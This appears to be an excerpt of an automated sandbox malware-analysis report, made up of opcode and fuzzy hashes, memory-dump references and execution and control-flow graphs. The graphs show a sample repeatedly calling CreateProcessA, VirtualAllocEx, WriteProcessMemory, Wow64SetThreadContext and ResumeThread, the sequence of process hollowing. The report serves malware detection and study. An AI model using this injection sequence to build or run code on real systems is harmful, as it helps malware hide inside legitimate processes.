                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b2f63333fe6420184b9630dcecaf8fdbf24f66637285fe47db88ab279c60bfde
                                                                      • Instruction ID: 49039f9c45ad8e01d751a74fba96d3810bc4e660e5d2c7c8847082e219d9619c
                                                                      • Opcode Fuzzy Hash: b2f63333fe6420184b9630dcecaf8fdbf24f66637285fe47db88ab279c60bfde
                                                                      • Instruction Fuzzy Hash: EBE0C26090A2885FD302CBBCA921B6C7F345B83208F1400DAC4449B2A2C6200E04DB21
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49809b77f41500d363c5d2b9eef99be4ef3558aa5f5c61c39d7288617b966a62
                                                                      • Instruction ID: 43013e128f1f2b0967e08730b0f3c37ab53a2fa683e23bbbd31f2af287fd62ab
                                                                      • Opcode Fuzzy Hash: 49809b77f41500d363c5d2b9eef99be4ef3558aa5f5c61c39d7288617b966a62
                                                                      • Instruction Fuzzy Hash: 88E0B674910208DFC744DFBCD59865CBBF4AB09305F2041A9D908A7360E6309A54CF81
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 91a34ec1680f36835f67c204b131e05fdadb1d09ef3604aedae7418710c45d15
                                                                      • Instruction ID: b3b2bc71882778c22cdfb8c05570ba84906304e45db8708addf44ef61f9cc37a
                                                                      • Opcode Fuzzy Hash: 91a34ec1680f36835f67c204b131e05fdadb1d09ef3604aedae7418710c45d15
                                                                      • Instruction Fuzzy Hash: CFD05E30C09208DBD704DFA8E8647ADBFB8ABC6305F2051A9C84833382C6301E56DB86
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f0e1f6103d8e350dc4c3845bfed820e866f58aa6629e0cd06d8fc50441a70fd
                                                                      • Instruction ID: 8a48c479b794dd3c694c329d87639b274622d452c6f065a188b62c88cb95bbba
                                                                      • Opcode Fuzzy Hash: 3f0e1f6103d8e350dc4c3845bfed820e866f58aa6629e0cd06d8fc50441a70fd
                                                                      • Instruction Fuzzy Hash: D4D0E230D00208ABCB44EFA8E85979CBBB4AB45605F5080A9C808A3280E6305A90CB81
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7dd033048b5f08dc52053363dc37298914da7c3c18e34aa4fae1ec7935a6363
                                                                      • Instruction ID: 0414c373e57043b042df296979f3b36d911c42441b0d575484b8212fec4fc38b
                                                                      • Opcode Fuzzy Hash: d7dd033048b5f08dc52053363dc37298914da7c3c18e34aa4fae1ec7935a6363
                                                                      • Instruction Fuzzy Hash: DCC0127080220DABC714DFADE825B6EBB6CEB82359F0010A9C808232A0DA311E10DBA5

                                                                      Execution Graph

                                                                      Execution Coverage:14.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:131
                                                                      Total number of Limit Nodes:13
                                                                      execution_graph 10189 3ae9fe 10191 3ae7fc 10189->10191 10190 3ae918 10191->10190 10193 730938 10191->10193 10194 730952 10193->10194 10209 730fc8 10194->10209 10224 731184 10194->10224 10229 730ce4 10194->10229 10234 731204 10194->10234 10239 730e47 10194->10239 10244 730f82 10194->10244 10256 730d3c 10194->10256 10263 730ebe 10194->10263 10268 730e9a 10194->10268 10280 7313db 10194->10280 10285 730d14 10194->10285 10290 731113 10194->10290 10302 730f33 10194->10302 10195 73095a 10195->10191 10306 3adf38 10209->10306 10310 3adf31 10209->10310 10210 730ea6 10211 731033 10210->10211 10212 730eb8 10210->10212 10214 7314e4 10210->10214 10314 3ae098 10210->10314 10318 3ae090 10210->10318 10213 731077 10212->10213 10322 3ad8a1 10212->10322 10326 3ad8a8 10212->10326 10215 73155f 10213->10215 10330 3ad7b8 10213->10330 10334 3ad7b1 10213->10334 10214->10195 10215->10195 10225 731077 10224->10225 10226 73155f 10225->10226 10227 3ad7b8 ResumeThread 10225->10227 10228 3ad7b1 ResumeThread 10225->10228 10226->10195 10227->10225 10228->10225 10230 730ce7 10229->10230 10338 3ae2d0 10230->10338 10342 3ae2c5 10230->10342 10235 731221 10234->10235 10237 3adf38 WriteProcessMemory 10235->10237 10238 3adf31 WriteProcessMemory 10235->10238 10236 7317c2 10237->10236 10238->10236 10240 730e4d 10239->10240 10241 730e7b 10240->10241 10242 3ae2d0 CreateProcessA 10240->10242 10243 3ae2c5 CreateProcessA 10240->10243 10241->10241 10242->10241 10243->10241 10245 730ea6 10244->10245 10246 730eb8 10245->10246 10249 7314e4 10245->10249 10252 3ae098 ReadProcessMemory 10245->10252 10253 3ae090 ReadProcessMemory 10245->10253 10247 731077 10246->10247 10250 3ad8a8 Wow64SetThreadContext 10246->10250 10251 3ad8a1 Wow64SetThreadContext 10246->10251 10248 73155f 10247->10248 10254 3ad7b8 ResumeThread 10247->10254 10255 3ad7b1 ResumeThread 10247->10255 10248->10195 10249->10195 10250->10246 10251->10246 10252->10245 10253->10245 10254->10247 10255->10247 10257 730d34 10256->10257 10258 730d20 10256->10258 10257->10195 10260 730df9 10258->10260 10261 3ae2d0 CreateProcessA 10258->10261 10262 3ae2c5 CreateProcessA 10258->10262 10259 730e7b 10259->10259 10260->10195 10261->10259 10262->10259 10264 730ec7 10263->10264 10346 3ade0c 10264->10346 10350 3ade10 10264->10350 10265 731843 10269 730ea6 10268->10269 10270 730eb8 10269->10270 10273 7314e4 10269->10273 10276 3ae098 ReadProcessMemory 10269->10276 10277 3ae090 ReadProcessMemory 10269->10277 10271 731077 10270->10271 10274 3ad8a8 Wow64SetThreadContext 10270->10274 10275 3ad8a1 Wow64SetThreadContext 10270->10275 10272 73155f 10271->10272 10278 3ad7b8 ResumeThread 10271->10278 10279 3ad7b1 ResumeThread 10271->10279 10272->10195 10273->10195 10274->10270 10275->10270 10276->10269 10277->10269 10278->10271 10279->10271 10281 7313f5 10280->10281 10283 3ade0c VirtualAllocEx 10281->10283 10284 3ade10 VirtualAllocEx 10281->10284 10282 731843 10283->10282 10284->10282 10286 730d1a 10285->10286 10288 3ae2d0 CreateProcessA 10286->10288 10289 3ae2c5 CreateProcessA 10286->10289 10287 730e7b 10287->10287 10288->10287 10289->10287 10291 730ea6 10290->10291 10291->10290 10292 7314e4 10291->10292 10293 730eb8 10291->10293 10300 3ae098 ReadProcessMemory 10291->10300 10301 3ae090 ReadProcessMemory 10291->10301 10292->10195 10294 731077 10293->10294 10296 3ad8a8 Wow64SetThreadContext 10293->10296 10297 3ad8a1 Wow64SetThreadContext 10293->10297 10295 73155f 10294->10295 10298 3ad7b8 ResumeThread 10294->10298 10299 3ad7b1 ResumeThread 10294->10299 10295->10195 10296->10293 10297->10293 10298->10294 10299->10294 10300->10291 10301->10291 10304 3adf38 WriteProcessMemory 10302->10304 10305 3adf31 WriteProcessMemory 10302->10305 10303 730f63 10303->10195 10304->10303 10305->10303 10307 3adf84 WriteProcessMemory 10306->10307 10309 3ae023 10307->10309 10309->10210 10311 3adf84 WriteProcessMemory 10310->10311 10313 3ae023 10311->10313 10313->10210 10315 3ae0e4 ReadProcessMemory 10314->10315 10317 3ae162 10315->10317 10317->10210 10319 3ae0e4 ReadProcessMemory 10318->10319 10321 3ae162 10319->10321 10321->10210 10323 3ad8f1 Wow64SetThreadContext 10322->10323 10325 3ad96f 10323->10325 10325->10212 10327 3ad8f1 Wow64SetThreadContext 10326->10327 10329 3ad96f 10327->10329 10329->10212 10331 3ad7fc ResumeThread 10330->10331 10333 3ad84e 10331->10333 10333->10213 10335 3ad7b8 ResumeThread 10334->10335 10337 3ad84e 10335->10337 10337->10213 10339 3ae357 10338->10339 10339->10339 10340 3ae542 CreateProcessA 10339->10340 10341 3ae5b5 10340->10341 10343 3ae357 CreateProcessA 10342->10343 10345 3ae5b5 10343->10345 10347 3ade54 VirtualAllocEx 10346->10347 10349 3aded2 10347->10349 10349->10265 10351 3ade54 VirtualAllocEx 10350->10351 10353 3aded2 10351->10353 10353->10265 10354 3aebcc 10355 3ae7fc 10354->10355 10356 3ae918 10355->10356 10357 730938 12 API calls 10355->10357 10357->10355

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 678 3ae2c5-3ae369 680 3ae36b-3ae382 678->680 681 3ae3b2-3ae3da 678->681 680->681 684 3ae384-3ae389 680->684 685 3ae3dc-3ae3f0 681->685 686 3ae420-3ae476 681->686 687 3ae38b-3ae395 684->687 688 3ae3ac-3ae3af 684->688 685->686 693 3ae3f2-3ae3f7 685->693 695 3ae478-3ae48c 686->695 696 3ae4bc-3ae5b3 CreateProcessA 686->696 690 3ae399-3ae3a8 687->690 691 3ae397 687->691 688->681 690->690 694 3ae3aa 690->694 691->690 697 3ae41a-3ae41d 693->697 698 3ae3f9-3ae403 693->698 694->688 695->696 704 3ae48e-3ae493 695->704 714 3ae5bc-3ae6a1 696->714 715 3ae5b5-3ae5bb 696->715 697->686 699 3ae407-3ae416 698->699 700 3ae405 698->700 699->699 703 3ae418 699->703 700->699 703->697 706 3ae4b6-3ae4b9 704->706 707 3ae495-3ae49f 704->707 706->696 708 3ae4a3-3ae4b2 707->708 709 3ae4a1 707->709 708->708 710 3ae4b4 708->710 709->708 710->706 727 3ae6a3-3ae6a7 714->727 728 3ae6b1-3ae6b5 714->728 715->714 727->728 729 3ae6a9 727->729 730 3ae6b7-3ae6bb 728->730 731 3ae6c5-3ae6c9 728->731 729->728 730->731 732 3ae6bd 730->732 733 3ae6cb-3ae6cf 731->733 734 3ae6d9-3ae6dd 731->734 732->731 733->734 737 3ae6d1 733->737 735 3ae6df-3ae708 734->735 736 3ae713-3ae71e 734->736 735->736 741 3ae71f 736->741 737->734 741->741
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003AE597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gP$gP$gP
                                                                      • API String ID: 963392458-345057509
                                                                      • Opcode ID: ad7b770c114c44f4000f20e9ab479d0bceb10e12dde4fed5589629441483e669
                                                                      • Instruction ID: 84a68e42814755705e8be9897cb97c8213c58564ec6357c00cef102f30515ab9
                                                                      • Opcode Fuzzy Hash: ad7b770c114c44f4000f20e9ab479d0bceb10e12dde4fed5589629441483e669
                                                                      • Instruction Fuzzy Hash: 9FC11570D002198FDF25DFA8C845BEEBBB1FB49304F0095AAD819B7290DB749A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 742 3ae2d0-3ae369 744 3ae36b-3ae382 742->744 745 3ae3b2-3ae3da 742->745 744->745 748 3ae384-3ae389 744->748 749 3ae3dc-3ae3f0 745->749 750 3ae420-3ae476 745->750 751 3ae38b-3ae395 748->751 752 3ae3ac-3ae3af 748->752 749->750 757 3ae3f2-3ae3f7 749->757 759 3ae478-3ae48c 750->759 760 3ae4bc-3ae5b3 CreateProcessA 750->760 754 3ae399-3ae3a8 751->754 755 3ae397 751->755 752->745 754->754 758 3ae3aa 754->758 755->754 761 3ae41a-3ae41d 757->761 762 3ae3f9-3ae403 757->762 758->752 759->760 768 3ae48e-3ae493 759->768 778 3ae5bc-3ae6a1 760->778 779 3ae5b5-3ae5bb 760->779 761->750 763 3ae407-3ae416 762->763 764 3ae405 762->764 763->763 767 3ae418 763->767 764->763 767->761 770 3ae4b6-3ae4b9 768->770 771 3ae495-3ae49f 768->771 770->760 772 3ae4a3-3ae4b2 771->772 773 3ae4a1 771->773 772->772 774 3ae4b4 772->774 773->772 774->770 791 3ae6a3-3ae6a7 778->791 792 3ae6b1-3ae6b5 778->792 779->778 791->792 793 3ae6a9 791->793 794 3ae6b7-3ae6bb 792->794 795 3ae6c5-3ae6c9 792->795 793->792 794->795 796 3ae6bd 794->796 797 3ae6cb-3ae6cf 795->797 798 3ae6d9-3ae6dd 795->798 796->795 797->798 801 3ae6d1 797->801 799 3ae6df-3ae708 798->799 800 3ae713-3ae71e 798->800 799->800 805 3ae71f 800->805 801->798 805->805
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003AE597
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: gP$gP$gP
                                                                      • API String ID: 963392458-345057509
                                                                      • Opcode ID: 94e5fb6fb099885272c2123449be9a6a7b8bf3997be6f8a0b48f17d5ff6c6c17
                                                                      • Instruction ID: 438df2273afbfcd6aefa70f91334365b4b2c59a3e7c99dc5cd762426ae91b021
                                                                      • Opcode Fuzzy Hash: 94e5fb6fb099885272c2123449be9a6a7b8bf3997be6f8a0b48f17d5ff6c6c17
                                                                      • Instruction Fuzzy Hash: 26C11470D002198FDF25DFA8C845BEEBBB1FB49304F0095AAD819B7290DB749A85CF95

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 914 3adf31-3adfa3 916 3adfba-3ae021 WriteProcessMemory 914->916 917 3adfa5-3adfb7 914->917 919 3ae02a-3ae07c 916->919 920 3ae023-3ae029 916->920 917->916 920->919
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: d89c1e0bb9f9cff0cf5008c098ae14459eeee5f3eae9a726e687869c376dbb90
                                                                      • Instruction ID: 9e965ba09de45950f71e1f59c9758c0c2d44faeb857c0f3f9a02c347e1c21f59
                                                                      • Opcode Fuzzy Hash: d89c1e0bb9f9cff0cf5008c098ae14459eeee5f3eae9a726e687869c376dbb90
                                                                      • Instruction Fuzzy Hash: B2419BB4D012589FCF00CFA9D984AEEFBB1FB49314F24942AE815B7250D375AA45CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 925 3adf38-3adfa3 927 3adfba-3ae021 WriteProcessMemory 925->927 928 3adfa5-3adfb7 925->928 930 3ae02a-3ae07c 927->930 931 3ae023-3ae029 927->931 928->927 931->930
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE00B
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: fe7897e69e32d189170359f8db6dea0946a63ad654557b5c85c2d2bd63545d95
                                                                      • Instruction ID: 6815619986f62dd1f608ebcb6355eaf0c091ca69a362bcc28b702dbca561891b
                                                                      • Opcode Fuzzy Hash: fe7897e69e32d189170359f8db6dea0946a63ad654557b5c85c2d2bd63545d95
                                                                      • Instruction Fuzzy Hash: 084198B4D002589FCF00CFA9D984AEEFBF1AB49314F24902AE815B7210D375AA45CB64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 936 3ae090-3ae160 ReadProcessMemory 939 3ae169-3ae1bb 936->939 940 3ae162-3ae168 936->940 940->939
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: cecf0369e98645f280abc383918f660689242a2731f28f1ac97c0f02419d8b0c
                                                                      • Instruction ID: 1dd5871eef6edba9dcaa5ca14cb6a43385e4c61916f6c6e8c59ab549c7852938
                                                                      • Opcode Fuzzy Hash: cecf0369e98645f280abc383918f660689242a2731f28f1ac97c0f02419d8b0c
                                                                      • Instruction Fuzzy Hash: 3441BCB9D042589FCF10CFA9D984AEEFBB1BF49310F14942AE815B7250C379A946CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 945 3ae098-3ae160 ReadProcessMemory 948 3ae169-3ae1bb 945->948 949 3ae162-3ae168 945->949 949->948
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003AE14A
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: c7f14bb020ef429eb7720981fdc6527c51b60331cd7802d264192f3391497d95
                                                                      • Instruction ID: c08278b670e448a32698247bc244773a986cc2c348d381f81064be863657feb6
                                                                      • Opcode Fuzzy Hash: c7f14bb020ef429eb7720981fdc6527c51b60331cd7802d264192f3391497d95
                                                                      • Instruction Fuzzy Hash: 494199B9D002589FCF10CFA9D984AEEFBB1BB49310F14942AE815B7200D735A945CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 954 3ade0c-3aded0 VirtualAllocEx 957 3aded9-3adf23 954->957 958 3aded2-3aded8 954->958 958->957
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003ADEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 9a71a228ce1fd7796a5061df38d214c632252ea5138cc84165bb463547a7f554
                                                                      • Instruction ID: baef16c6532b2abac47c2ebe928a51f4716af7b300c752e37bc77ffcd78761c0
                                                                      • Opcode Fuzzy Hash: 9a71a228ce1fd7796a5061df38d214c632252ea5138cc84165bb463547a7f554
                                                                      • Instruction Fuzzy Hash: 0241AAB8D002589FCF10CFA9D980AEEFBB1AF49310F14941AE815BB314D735A946CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 963 3ade10-3aded0 VirtualAllocEx 966 3aded9-3adf23 963->966 967 3aded2-3aded8 963->967 967->966
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003ADEBA
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: ae40c9ac916b9db82a2362f8855f313095daec7d6288f6a6fadfb402ae1a27b8
                                                                      • Instruction ID: 9690f7798865f3b0d2ebb0209ba92edb10e4e922fac5a9613cfe71a8c4c670d3
                                                                      • Opcode Fuzzy Hash: ae40c9ac916b9db82a2362f8855f313095daec7d6288f6a6fadfb402ae1a27b8
                                                                      • Instruction Fuzzy Hash: 374199B8D002589FCF10CFA9D984AAEFBB1EB49310F10942AE815BB314D735A945CFA5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 972 3ad8a1-3ad908 974 3ad90a-3ad91c 972->974 975 3ad91f-3ad96d Wow64SetThreadContext 972->975 974->975 977 3ad96f-3ad975 975->977 978 3ad976-3ad9c2 975->978 977->978
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 003AD957
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 5c6b018e831dd07b45ec3e67a3fd620ceddfefd85f147e863e7bc1a29caa3240
                                                                      • Instruction ID: bc29909c9805f0a0621a59d10c595be73e41af8b944615a83665f93cf7becde5
                                                                      • Opcode Fuzzy Hash: 5c6b018e831dd07b45ec3e67a3fd620ceddfefd85f147e863e7bc1a29caa3240
                                                                      • Instruction Fuzzy Hash: A741BCB5D012589FCF10CFA9D884AEEFFB1AF49314F24842AE855B7244C739AA49CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 983 3ad8a8-3ad908 985 3ad90a-3ad91c 983->985 986 3ad91f-3ad96d Wow64SetThreadContext 983->986 985->986 988 3ad96f-3ad975 986->988 989 3ad976-3ad9c2 986->989 988->989
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 003AD957
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 36d8eb8dd6cf3ee1334107174d94bfa1615ba0f8d493c60ccebce708b2a46a53
                                                                      • Instruction ID: a190d4df0fb3b038698ac86b92de67671df733909f6ef83568560b8bbc4be91b
                                                                      • Opcode Fuzzy Hash: 36d8eb8dd6cf3ee1334107174d94bfa1615ba0f8d493c60ccebce708b2a46a53
                                                                      • Instruction Fuzzy Hash: 6B41ACB5D002589FCF10CFA9D884AEEFBB1AF49314F24802AE415B7244D739A949CF54

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 994 3ad7b1-3ad84c ResumeThread 998 3ad84e-3ad854 994->998 999 3ad855-3ad897 994->999 998->999
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 003AD836
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: e5795dc8391d3a2328601fc6ee85dfdae146a70d513f9414906f1dcf4ef5b3e3
                                                                      • Instruction ID: 7a15c0bad2c9d2841b4fe13e2ecfab0b0f4ff54d9e0a7caee59ba71fef2d39ec
                                                                      • Opcode Fuzzy Hash: e5795dc8391d3a2328601fc6ee85dfdae146a70d513f9414906f1dcf4ef5b3e3
                                                                      • Instruction Fuzzy Hash: 8731CAB5D002189FCF10CFA9D884AEEFBB5EB49314F24842AE819B7300C735A906CF94
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 003AD836
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496820835.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_3a0000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 644f8c61272188629491dde1e53eb94faf6746bdbca9087f5ad75ba9d7f75d07
                                                                      • Instruction ID: 810134707a2e8dd62aafcc32470492c9dca4d1cf87f1b57573453f4f273eee52
                                                                      • Opcode Fuzzy Hash: 644f8c61272188629491dde1e53eb94faf6746bdbca9087f5ad75ba9d7f75d07
                                                                      • Instruction Fuzzy Hash: FE31B9B4D002189FCF14CFA9D984AAEFBB5EF49314F24942AE815B7700C735A945CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: gP
                                                                      • API String ID: 0-2783328264
                                                                      • Opcode ID: e5d59a68aa3f0337122e83192a37f4c80bff99a067be896e3eabc3734aff267e
                                                                      • Instruction ID: 7d1acb91180fba5f0189f059d03fa90a51e6068b726907f524dd7f802f2bba09
                                                                      • Opcode Fuzzy Hash: e5d59a68aa3f0337122e83192a37f4c80bff99a067be896e3eabc3734aff267e
                                                                      • Instruction Fuzzy Hash: CE412975E45219CFDB24CFA4C840BEDB7B9BF99300F1096A6D509A6241E7746AC4DF80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 71fdf9e3463f563da9374203e603bf911714e53e37ba6adcfad83672b1dbdeba
                                                                      • Instruction ID: edb19284fa3f1ab8ca3489e8fa02103801ffed5b165095e05151e7ae4c0195a5
                                                                      • Opcode Fuzzy Hash: 71fdf9e3463f563da9374203e603bf911714e53e37ba6adcfad83672b1dbdeba
                                                                      • Instruction Fuzzy Hash: 3C01EF3590A228CFEB60CF64C884FEDBBB5AB09314F54819AD40DA3252C7359E86DF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.500598789.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_730000_rrwscqkDSNwLK.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a35695c699070e987d51209979f13dd01c6c1a299a16b47fb6d444fc27aeb3d
                                                                      • Instruction ID: 630f5440c87cb63fbc0c5011befa8a5bd29bb1f8ce8a0c1fd54af5d0d3284e92
                                                                      • Opcode Fuzzy Hash: 3a35695c699070e987d51209979f13dd01c6c1a299a16b47fb6d444fc27aeb3d
                                                                      • Instruction Fuzzy Hash: 09414D74909218CFEB64CF54C954BE8B7B9BB4A311F5491DAC40EA3292D7399EC5DF00
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.496101460.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
